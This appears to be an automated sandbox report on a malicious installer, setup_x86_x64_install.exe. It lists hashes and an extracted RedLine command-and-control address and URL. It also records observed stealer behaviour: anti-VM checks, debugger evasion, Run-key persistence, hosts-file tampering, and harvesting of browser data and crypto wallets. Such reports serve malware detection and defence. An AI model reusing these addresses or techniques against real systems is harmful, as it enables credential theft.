Overview
overview
10Static
static
setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows11_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10Resubmissions
30-09-2021 05:45
210930-gf4veagef9 1029-09-2021 21:32
210929-1dyp6agaam 1029-09-2021 18:54
210929-xkfldaffb2 10Analysis
-
max time kernel
930s -
max time network
1791s -
platform
windows11_x64 -
resource
win11 -
submitted
29-09-2021 18:54
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-ja-20210920
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7v20210408
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7-de-20210920
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win10v20210408
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10-ja-20210920
Behavioral task
behavioral7
Sample
setup_x86_x64_install.exe
Resource
win10-en-20210920
General
-
Target
setup_x86_x64_install.exe
-
Size
7.1MB
-
MD5
cd08a9c57ce8115745d3a99dec48847d
-
SHA1
2ea5cea16935f511935a86ea7a2903a44d593247
-
SHA256
52895feec7505eb0c3a418c93ecaf8559d4d7f9f67c68e3a268c606c069d04cc
-
SHA512
0ad7757713eca784f6b8c50e1912f91264f0e210dd61e7a6e779390dc2040b6744d552aac120c2ec8d65bfbb048672cb7959d026691ef1037b63e24fec024233
Malware Config
Extracted
http://shellloader.top/welcome
Extracted
redline
ANI
45.142.215.47:27643
Signatures
-
Process spawned unexpected child process 5 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
rundll32.exerundll32.exerundll32.exerundll32.exerundll32.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5456 4884 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6004 4884 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5932 4884 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6048 4884 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 8704 4884 rundll32.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
Processes:
resource yara_rule behavioral4/memory/5708-277-0x0000000000000000-mapping.dmp family_redline behavioral4/memory/5708-278-0x0000000000400000-0x0000000000422000-memory.dmp family_redline -
Socelars Payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS043CC0F0\Wed15ac1df9305ded09.exe family_socelars C:\Users\Admin\AppData\Local\Temp\7zS043CC0F0\Wed15ac1df9305ded09.exe family_socelars -
Suspicious use of NtCreateProcessExOtherParentProcess 43 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.execmd.exeBuhinylaco.exeWerFault.exeWerFault.exeMsiExec.exeWerFault.exeWerFault.exeWerFault.exepowershell.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeforfiles.exeWerFault.exeWerFault.exe2819.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exedescription pid process target process PID 5744 created 3488 5744 WerFault.exe Wed15ac1df9305ded09.exe PID 5156 created 1176 5156 WerFault.exe ShadowVPNInstaller_t1.exe PID 5672 created 2520 5672 WerFault.exe Conhost.exe PID 5864 created 5028 5864 WerFault.exe Wed15edb855a49.exe PID 3312 created 5516 3312 WerFault.exe rundll32.exe PID 3640 created 784 3640 WerFault.exe Wed151f5e3fd2.exe PID 5948 created 716 5948 WerFault.exe PID 5952 created 1176 5952 WerFault.exe ShadowVPNInstaller_t1.exe PID 5368 created 1176 5368 WerFault.exe ShadowVPNInstaller_t1.exe PID 5848 created 5640 5848 WerFault.exe Firstoffer.exe PID 5776 created 1176 5776 WerFault.exe ShadowVPNInstaller_t1.exe PID 2880 created 664 2880 WerFault.exe setup.exe PID 5716 created 1176 5716 WerFault.exe ShadowVPNInstaller_t1.exe PID 3696 created 2896 3696 cmd.exe msedge.exe PID 7028 created 5216 7028 Buhinylaco.exe hx8zKDisWjElqWnOPvs7qHfF.exe PID 504 created 6464 504 WerFault.exe 9DozPzDynjFKwiIswvyuxQd7.exe PID 5604 created 4768 5604 WerFault.exe dK4GoEA4II29LNHp3L6J1CN8.exe PID 4304 created 5472 4304 MsiExec.exe cmd.exe PID 3708 created 6052 3708 WerFault.exe eRSVwarLdW_vKn04ZbdisJ63.exe PID 3152 created 3756 3152 WerFault.exe ycWCTC54TlrQm0mZXPsuqm8m.exe PID 5292 created 1176 5292 WerFault.exe ShadowVPNInstaller_t1.exe PID 7484 created 1176 7484 powershell.exe ShadowVPNInstaller_t1.exe PID 6576 created 6164 6576 WerFault.exe Otkl2w3MYaOYZNGLpudAaCMk.exe PID 456 created 3728 456 WerFault.exe taskkill.exe PID 2164 created 5660 2164 WerFault.exe 9IjMd5iOi77WqNnRpTgopX7E.exe PID 6012 created 5472 6012 WerFault.exe cmd.exe PID 2572 created 3132 2572 WerFault.exe vc.exe PID 8092 created 7808 8092 WerFault.exe rundll32.exe PID 6640 created 1176 6640 WerFault.exe ShadowVPNInstaller_t1.exe PID 6772 created 1176 6772 WerFault.exe ShadowVPNInstaller_t1.exe PID 7236 created 2792 7236 WerFault.exe rundll32.exe PID 2836 created 1176 2836 forfiles.exe ShadowVPNInstaller_t1.exe PID 3492 created 2844 3492 WerFault.exe gcleaner.exe PID 8148 created 1176 8148 WerFault.exe ShadowVPNInstaller_t1.exe PID 2212 created 3532 2212 2819.exe C1FB.exe PID 7060 created 1176 7060 WerFault.exe ShadowVPNInstaller_t1.exe PID 6672 created 1176 6672 WerFault.exe ShadowVPNInstaller_t1.exe PID 6752 created 1176 6752 WerFault.exe ShadowVPNInstaller_t1.exe PID 6584 created 8020 6584 WerFault.exe 4007.exe PID 8272 created 16132 8272 WerFault.exe GcleanerEU.exe PID 8760 created 8728 8760 WerFault.exe rundll32.exe PID 9004 created 2484 9004 WerFault.exe gcleaner.exe PID 14356 created 14112 14356 WerFault.exe InternodesPiets_2021-09-29_21-00.exe -
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 2 IoCs
Processes:
resource yara_rule behavioral4/memory/716-358-0x00000000021B0000-0x0000000002284000-memory.dmp family_vidar behavioral4/memory/5640-441-0x00000000021C0000-0x0000000002294000-memory.dmp family_vidar -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS043CC0F0\libcurlpp.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS043CC0F0\libcurlpp.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS043CC0F0\libstdc++-6.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS043CC0F0\libstdc++-6.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS043CC0F0\libcurl.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS043CC0F0\libcurl.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS043CC0F0\libcurl.dll aspack_v212_v242 -
Blocklisted process makes network request 42 IoCs
Processes:
powershell.exepowershell.exeMsiExec.exeflow pid process 174 5188 powershell.exe 212 6864 powershell.exe 376 7192 MsiExec.exe 379 7192 MsiExec.exe 381 7192 MsiExec.exe 384 7192 MsiExec.exe 390 7192 MsiExec.exe 391 7192 MsiExec.exe 392 7192 MsiExec.exe 396 7192 MsiExec.exe 400 7192 MsiExec.exe 401 7192 MsiExec.exe 402 7192 MsiExec.exe 404 7192 MsiExec.exe 405 7192 MsiExec.exe 406 7192 MsiExec.exe 407 7192 MsiExec.exe 408 7192 MsiExec.exe 409 7192 MsiExec.exe 411 7192 MsiExec.exe 413 7192 MsiExec.exe 414 7192 MsiExec.exe 415 7192 MsiExec.exe 416 7192 MsiExec.exe 418 7192 MsiExec.exe 419 7192 MsiExec.exe 420 7192 MsiExec.exe 421 7192 MsiExec.exe 422 7192 MsiExec.exe 423 7192 MsiExec.exe 424 7192 MsiExec.exe 425 7192 MsiExec.exe 426 7192 MsiExec.exe 427 7192 MsiExec.exe 428 7192 MsiExec.exe 429 7192 MsiExec.exe 430 7192 MsiExec.exe 431 7192 MsiExec.exe 432 7192 MsiExec.exe 433 7192 MsiExec.exe 436 7192 MsiExec.exe 440 7192 MsiExec.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
Processes:
Conhost.exeSharefolder.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts Conhost.exe File opened for modification C:\Windows\system32\drivers\etc\hosts Sharefolder.exe -
Executes dropped EXE 64 IoCs
Processes:
setup_installer.exesetup_install.exeWed151f5e3fd2.exeWed1529d8198a8f0c1.exeWed15228d911b9d5c.exeWed15cdfe4f1ee8.exeWed154a69e494d5e99ca.exeWed15ac1df9305ded09.exeWed15c2e7469a14dca.exeWed15bfd6504f7748c.exeWed1556d5b7e9b2c8.exeWed15fbd6ef41b4f.exeWed15566afaea59e.exeWed15e2f113a40ce5.exeWed15edb855a49.exeWed150b6a68b74a9.exeWed15fbd6ef41b4f.tmpSkVPVS3t6Y8W.EXeConhost.exeLzmwAqmV.exeUW7CKXEsUQxJjyDaLLnybOuF.exe1207294.scrVC_redist.x86.exeChrome 5.exeFirstoffer.exe6844977.scrShadowVPNInstaller_t1.execmd.exeWerFault.exeDownFlSetup110.exeWinHoster.exe6215607.scrsetup.exerundll32.exesetup_2.exe2595946.scrjhuuee.exe4384150.scrsetup_2.tmppli-game.exeConhost.exesetup_2.exesetup_2.tmp9IjMd5iOi77WqNnRpTgopX7E.exe1156783.scr2805835.scrS97FKkMft.eXEmshta.exeultramediaburner.exeultramediaburner.tmpConhost.exeNypaedobuzhi.exeUltraMediaBurner.exeTabalotaevo.exe8983957.scrinstaller.exeinstaller.tmpvc.exevc.exefmv4TorJh.exehK6RrLn9hqeFIawsTd99yGDw.execmd.exe9kOPLAnIB3uueauOt9hpoSeF.exepid process 4928 setup_installer.exe 4740 setup_install.exe 784 Wed151f5e3fd2.exe 4532 Wed1529d8198a8f0c1.exe 1448 Wed15228d911b9d5c.exe 3820 Wed15cdfe4f1ee8.exe 3600 Wed154a69e494d5e99ca.exe 3488 Wed15ac1df9305ded09.exe 716 Wed15c2e7469a14dca.exe 2520 Wed15bfd6504f7748c.exe 4872 Wed1556d5b7e9b2c8.exe 1132 Wed15fbd6ef41b4f.exe 908 Wed15566afaea59e.exe 1176 Wed15e2f113a40ce5.exe 5028 Wed15edb855a49.exe 4936 Wed150b6a68b74a9.exe 5328 Wed15fbd6ef41b4f.tmp 5664 SkVPVS3t6Y8W.EXe 5728 Conhost.exe 6000 LzmwAqmV.exe 5708 UW7CKXEsUQxJjyDaLLnybOuF.exe 5184 1207294.scr 4412 VC_redist.x86.exe 4772 Chrome 5.exe 5640 Firstoffer.exe 5860 6844977.scr 1176 ShadowVPNInstaller_t1.exe 2488 cmd.exe 5604 WerFault.exe 5992 DownFlSetup110.exe 2928 WinHoster.exe 5396 6215607.scr 664 setup.exe 5892 rundll32.exe 1460 setup_2.exe 4820 2595946.scr 1940 jhuuee.exe 1036 4384150.scr 5240 setup_2.tmp 4212 pli-game.exe 1500 Conhost.exe 2088 setup_2.exe 3204 setup_2.tmp 5660 9IjMd5iOi77WqNnRpTgopX7E.exe 3104 1156783.scr 5016 2805835.scr 2096 S97FKkMft.eXE 1384 mshta.exe 1388 ultramediaburner.exe 6028 ultramediaburner.tmp 4232 Conhost.exe 5936 Nypaedobuzhi.exe 5752 UltraMediaBurner.exe 4972 Tabalotaevo.exe 1896 8983957.scr 1128 installer.exe 4676 installer.tmp 1844 vc.exe 3132 vc.exe 4412 VC_redist.x86.exe 5868 fmv4TorJh.exe 724 hK6RrLn9hqeFIawsTd99yGDw.exe 5472 cmd.exe 656 9kOPLAnIB3uueauOt9hpoSeF.exe -
Checks BIOS information in registry 2 TTPs 18 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Wed15566afaea59e.exe9kOPLAnIB3uueauOt9hpoSeF.exeMoney10k_.exe6104082.scr6215607.scrConhost.exeUW7CKXEsUQxJjyDaLLnybOuF.exedZkG2OPoMBTkHjSZSFXRaVbC.exeInstall.exeInstall.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Wed15566afaea59e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 9kOPLAnIB3uueauOt9hpoSeF.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Money10k_.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6104082.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6215607.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Conhost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion UW7CKXEsUQxJjyDaLLnybOuF.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion UW7CKXEsUQxJjyDaLLnybOuF.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion dZkG2OPoMBTkHjSZSFXRaVbC.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6215607.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6104082.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Money10k_.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Wed15566afaea59e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Conhost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 9kOPLAnIB3uueauOt9hpoSeF.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion dZkG2OPoMBTkHjSZSFXRaVbC.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Drops startup file 2 IoCs
Processes:
NetFrame.exeRuntimeBroker.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exe.lnk NetFrame.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\updater.lnk RuntimeBroker.exe -
Loads dropped DLL 62 IoCs
Processes:
setup_install.exeWed15fbd6ef41b4f.tmprundll32.exesetup_2.tmpsetup_2.tmpConhost.exemsedge.exerundll32.exeinstaller.tmprundll32.exevc.exerundll32.exerundll32.exeWerFault.exerundll32.exerundll32.exerundll32.exeinstaller.execsd88PDQZtISk4QhxvoPVz04.tmprundll32.exeMsiExec.exeShadowVPNInstaller_t1.exerundll32.exerundll32.exeMsiExec.exe2819.exeMsiExec.exerundll32.exeMsiExec.exerundll32.exepid process 4740 setup_install.exe 4740 setup_install.exe 4740 setup_install.exe 4740 setup_install.exe 4740 setup_install.exe 4740 setup_install.exe 4740 setup_install.exe 5328 Wed15fbd6ef41b4f.tmp 5516 rundll32.exe 5240 setup_2.tmp 3204 setup_2.tmp 3064 Conhost.exe 2896 msedge.exe 5620 rundll32.exe 4676 installer.tmp 4264 rundll32.exe 4264 rundll32.exe 3132 vc.exe 5892 rundll32.exe 5892 rundll32.exe 6536 rundll32.exe 7060 WerFault.exe 7380 rundll32.exe 7380 rundll32.exe 4192 rundll32.exe 4192 rundll32.exe 6228 rundll32.exe 6228 rundll32.exe 676 installer.exe 676 installer.exe 5360 csd88PDQZtISk4QhxvoPVz04.tmp 676 installer.exe 7808 rundll32.exe 2208 MsiExec.exe 2208 MsiExec.exe 1176 ShadowVPNInstaller_t1.exe 2792 rundll32.exe 1176 ShadowVPNInstaller_t1.exe 1176 ShadowVPNInstaller_t1.exe 5312 rundll32.exe 7192 MsiExec.exe 7192 MsiExec.exe 7192 MsiExec.exe 7192 MsiExec.exe 7192 MsiExec.exe 7192 MsiExec.exe 7192 MsiExec.exe 2212 2819.exe 2212 2819.exe 7192 MsiExec.exe 7252 MsiExec.exe 7252 MsiExec.exe 7192 MsiExec.exe 7192 MsiExec.exe 676 installer.exe 7192 MsiExec.exe 7192 MsiExec.exe 5764 rundll32.exe 4304 MsiExec.exe 4304 MsiExec.exe 7192 MsiExec.exe 8728 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS043CC0F0\Wed15566afaea59e.exe themida C:\Users\Admin\AppData\Local\Temp\7zS043CC0F0\Wed15566afaea59e.exe themida behavioral4/memory/908-252-0x0000000000EF0000-0x0000000000EF1000-memory.dmp themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 12 IoCs
Processes:
VC_redist.x86.execmd.exeConhost.exefmv4TorJh.exemsedge.exeInstaller.exeSharefolder.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" VC_redist.x86.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce cmd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\FarLabUninstaller\\Cilezhaetotae.exe\"" Conhost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" fmv4TorJh.exe Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce VC_redist.x86.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" cmd.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce fmv4TorJh.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce Installer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" Installer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\{a8968509-65be-4c09-a460-fd1584b1cdbf} = "\"C:\\ProgramData\\Package Cache\\{a8968509-65be-4c09-a460-fd1584b1cdbf}\\VC_redist.x86.exe\" /burn.runonce" VC_redist.x86.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Microsoft.NET\\Juloralycu.exe\"" Sharefolder.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
6215607.scrUW7CKXEsUQxJjyDaLLnybOuF.exe9kOPLAnIB3uueauOt9hpoSeF.exedZkG2OPoMBTkHjSZSFXRaVbC.exe6104082.scrMoney10k_.exeWed15566afaea59e.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 6215607.scr Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA UW7CKXEsUQxJjyDaLLnybOuF.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 9kOPLAnIB3uueauOt9hpoSeF.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA dZkG2OPoMBTkHjSZSFXRaVbC.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 6104082.scr Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Money10k_.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Wed15566afaea59e.exe -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
2819.exemsiexec.exemsiexec.exemsiexec.exeinstaller.exedescription ioc process File opened (read-only) \??\U: 2819.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\A: 2819.exe File opened (read-only) \??\H: 2819.exe File opened (read-only) \??\R: 2819.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\R: installer.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\T: 2819.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\J: installer.exe File opened (read-only) \??\W: installer.exe File opened (read-only) \??\Y: installer.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\M: installer.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\E: installer.exe File opened (read-only) \??\K: installer.exe File opened (read-only) \??\G: 2819.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\I: installer.exe File opened (read-only) \??\S: installer.exe File opened (read-only) \??\S: 2819.exe File opened (read-only) \??\O: installer.exe File opened (read-only) \??\Q: installer.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\Q: 2819.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\P: installer.exe File opened (read-only) \??\X: installer.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\A: installer.exe File opened (read-only) \??\H: installer.exe File opened (read-only) \??\L: installer.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\J: 2819.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\B: 2819.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\B: installer.exe File opened (read-only) \??\F: installer.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\P: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 7 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 1 ipinfo.io 1 ip-api.com 3 ip-api.com 3 ipinfo.io 17 ipinfo.io 106 ipinfo.io 175 ipinfo.io -
Drops file in System32 directory 2 IoCs
Processes:
Install.exeInstall.exedescription ioc process File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini Install.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 20 IoCs
Processes:
Wed15566afaea59e.exe6215607.scrConhost.exe9kOPLAnIB3uueauOt9hpoSeF.exeUW7CKXEsUQxJjyDaLLnybOuF.exefgDR8hyJENJYl9yqtAWdPr0t.exedZkG2OPoMBTkHjSZSFXRaVbC.exe6104082.scrMoney10k_.exepid process 908 Wed15566afaea59e.exe 5396 6215607.scr 4232 Conhost.exe 656 9kOPLAnIB3uueauOt9hpoSeF.exe 5708 UW7CKXEsUQxJjyDaLLnybOuF.exe 6568 fgDR8hyJENJYl9yqtAWdPr0t.exe 6396 dZkG2OPoMBTkHjSZSFXRaVbC.exe 6568 fgDR8hyJENJYl9yqtAWdPr0t.exe 6568 fgDR8hyJENJYl9yqtAWdPr0t.exe 6568 fgDR8hyJENJYl9yqtAWdPr0t.exe 6568 fgDR8hyJENJYl9yqtAWdPr0t.exe 6568 fgDR8hyJENJYl9yqtAWdPr0t.exe 7700 6104082.scr 6568 fgDR8hyJENJYl9yqtAWdPr0t.exe 6568 fgDR8hyJENJYl9yqtAWdPr0t.exe 6568 fgDR8hyJENJYl9yqtAWdPr0t.exe 6568 fgDR8hyJENJYl9yqtAWdPr0t.exe 6568 fgDR8hyJENJYl9yqtAWdPr0t.exe 6568 fgDR8hyJENJYl9yqtAWdPr0t.exe 14120 Money10k_.exe -
Suspicious use of SetThreadContext 12 IoCs
Processes:
ShadowVPNInstaller_t1.exemshta.exehx8zKDisWjElqWnOPvs7qHfF.exeWerFault.exeWerFault.exeservices64.exeWerFault.exe7Ga22DMpgGLNmIcC0zmTTu3r.exe2628.exe184C.exetmp58DF_tmp.exesvchost.exedescription pid process target process PID 1176 set thread context of 5708 1176 ShadowVPNInstaller_t1.exe UW7CKXEsUQxJjyDaLLnybOuF.exe PID 1384 set thread context of 4988 1384 mshta.exe explorer.exe PID 5216 set thread context of 6632 5216 hx8zKDisWjElqWnOPvs7qHfF.exe hx8zKDisWjElqWnOPvs7qHfF.exe PID 5604 set thread context of 6960 5604 WerFault.exe Install.exe PID 6592 set thread context of 2676 6592 WerFault.exe spcXk4nVIHzYkQq80aGWITZP.exe PID 5872 set thread context of 7532 5872 services64.exe explorer.exe PID 7060 set thread context of 6424 7060 WerFault.exe Helper.exe PID 4948 set thread context of 4984 4948 7Ga22DMpgGLNmIcC0zmTTu3r.exe 7Ga22DMpgGLNmIcC0zmTTu3r.exe PID 6460 set thread context of 5552 6460 2628.exe 2628.exe PID 7764 set thread context of 5432 7764 184C.exe 184C.exe PID 6264 set thread context of 7604 6264 tmp58DF_tmp.exe tmp58DF_tmp.exe PID 5228 set thread context of 7572 5228 svchost.exe svchost.exe -
Drops file in Program Files directory 22 IoCs
Processes:
ultramediaburner.tmpConhost.exeRDBlgIibAm197edTZKeOiIT0.exeSharefolder.exehK6RrLn9hqeFIawsTd99yGDw.exesetup_2.tmpdescription ioc process File opened for modification C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe ultramediaburner.tmp File created C:\Program Files (x86)\UltraMediaBurner\is-GO06K.tmp ultramediaburner.tmp File created C:\Program Files (x86)\UltraMediaBurner\unins000.dat ultramediaburner.tmp File created C:\Program Files (x86)\FarLabUninstaller\Cilezhaetotae.exe.config Conhost.exe File created C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe RDBlgIibAm197edTZKeOiIT0.exe File created C:\Program Files (x86)\Microsoft.NET\Juloralycu.exe.config Sharefolder.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\Installer.exe hK6RrLn9hqeFIawsTd99yGDw.exe File created C:\Program Files (x86)\Company\NewProduct\Uninstall.ini hK6RrLn9hqeFIawsTd99yGDw.exe File created C:\Program Files\Common Files\XBSTOVHWPB\foldershare.exe Sharefolder.exe File created C:\Program Files (x86)\Microsoft.NET\Juloralycu.exe Sharefolder.exe File created C:\Program Files (x86)\FarLabUninstaller\unins000.dat setup_2.tmp File opened for modification C:\Program Files (x86)\FarLabUninstaller\unins000.dat setup_2.tmp File created C:\Program Files\Uninstall Information\HWAUGXAZDQ\ultramediaburner.exe Conhost.exe File created C:\Program Files\Uninstall Information\HWAUGXAZDQ\ultramediaburner.exe.config Conhost.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\cm3.exe hK6RrLn9hqeFIawsTd99yGDw.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\Uninstall.exe hK6RrLn9hqeFIawsTd99yGDw.exe File opened for modification C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe RDBlgIibAm197edTZKeOiIT0.exe File created C:\Program Files\Common Files\XBSTOVHWPB\foldershare.exe.config Sharefolder.exe File created C:\Program Files 